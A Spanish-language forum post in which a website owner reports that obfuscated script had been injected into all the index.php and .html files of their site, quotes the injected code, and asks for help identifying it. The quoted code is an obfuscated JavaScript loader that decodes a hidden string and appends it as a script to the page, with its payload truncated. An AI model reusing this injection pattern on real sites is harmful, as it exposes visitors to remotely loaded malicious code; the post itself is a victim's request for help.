hola gente
hace unas semanas me surgio un problemita q creo no se si ya esta bien.
a mi suponer me inyectaron codigo en mi sitio.
Cuando solicitaba mi sitio me aparecia una pantalla blanca con un error de sintaxis en el index.php del raiz. Cuando abro el index para ver q era lo q estaba tirando ese erro me encuentro con un codigo q nunca habia visto
<!--Injection_head[SessionId= ,version=2.0,type=FindDomainName,CRC32= ]--><script>var uid = '', path=' ', host=String.fromCharCode(111,103,106,111,118,112,1 03,114,110,118,46,105,110);</script><script>var PyST41 = "e"; eval("var SNmr81 = /k"+"ok"+"o11/i"+"g"); var nBwJ82 = "%"; var HPHb31 = "koko1164koko116Fk......................"; var tpsH92 = document.createElement("script"); tpsH92.type = "text/javascript"; tpsH92.text = window["un"+PyST41+"sc"+"ap"+PyST41+""](HPHb31["r"+""+PyST41+"p"+"lac"+PyST41](SNmr81,nBwJ82)); document.body["app"+PyST41+"ndChild"](tpsH92); </script><!--Injection_tail[SessionId=645D848E]-->
le borre esto, y luego dio el mismo error en otro index pero esta vez de extension ".html". Este cdigo estaba plasmado en todos los index .php y .html del sitio.
La base de datos no parece estar mal. No puedo detectar por donde me entraron pero si se q la modificacion se realizo en un dia en el q yo no estuve trabajando sobre el sitio, por esta razon sospecho q es un ataque.
Si alguien tiene una idea de q puede ser con exactitud y decirme q hacer se lo agradeceria.